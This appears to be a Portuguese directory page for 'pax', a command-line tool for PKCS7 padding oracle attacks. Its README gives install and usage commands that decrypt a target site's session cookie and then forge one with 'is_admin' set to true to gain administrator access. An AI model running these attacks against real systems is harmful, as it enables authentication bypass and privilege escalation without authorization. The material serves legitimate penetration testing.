Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
pax — :skull: :unlock: Ferramenta de CLI para ataques de oracle de preenchimento PKCS7 | Kitploit
Ferramentas/GitHubGitHub/liamg/pax
ExploraçãoExploração de Aplicações WebCriptografiaTestes de Penetração
GitHubliamg/pax

pax

💀 🔓 Ferramenta de CLI para ataques de oracle de preenchimento PKCS7

Ver Repositório
14217há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

pax

Travis Build Status GoReportCard

Explore oráculos de padding para diversão e lucro!

Pax (PAdding oracle eXploiter) é uma ferramenta para explorar oráculos de padding com o objetivo de:

  1. Obter texto simples para um determinado trecho de dados criptografados em CBC.
  2. Obter bytes criptografados para um determinado texto simples, utilizando o algoritmo de criptografia desconhecido usado pelo oráculo.

Isso pode ser usado para revelar informações de sessão criptografadas e, frequentemente, para ignorar autenticação, elevar privilégios e executar código remotamente, criptografando texto simples personalizado e escrevendo-o de volta no servidor.

Como sempre, esta ferramenta deve ser usada apenas em sistemas que você possui e/ou tem permissão para testar!

Instalação

Baixe a partir dos releases, ou instale com Go:

root@kitploit:~
go get -u github.com/liamg/pax/cmd/pax

Exemplo de Uso

Se você encontrar um possível oráculo, onde os dados criptografados estão armazenados dentro de um cookie chamado SESS, você pode usar o seguinte:

root@kitploit:~
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

Isso provavelmente lhe dará algum texto simples, talvez algo como:

root@kitploit:~
 {"user_id": 456, "is_admin": false}

Parece que você pode elevar seus privilégios aqui!

Você pode tentar fazer isso primeiro gerando seus próprios dados criptografados que o oráculo descriptografará de volta para algum texto simples sorrateiro:

root@kitploit:~
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

Isso produzirá um outro conjunto de dados criptografados codificados em base64, talvez algo como:

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Agora você pode abrir seu navegador e definir o valor do cookie SESS para o valor acima. Carregando a página do oráculo original, você deve ver que foi elevado ao nível de administrador.

Como isso funciona?

Os seguintes são ótimos guias sobre como esse ataque funciona:

  • https://robertheaton.com/2013/07/29/padding-oracle-attack/
  • https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth
Baixar ferramenta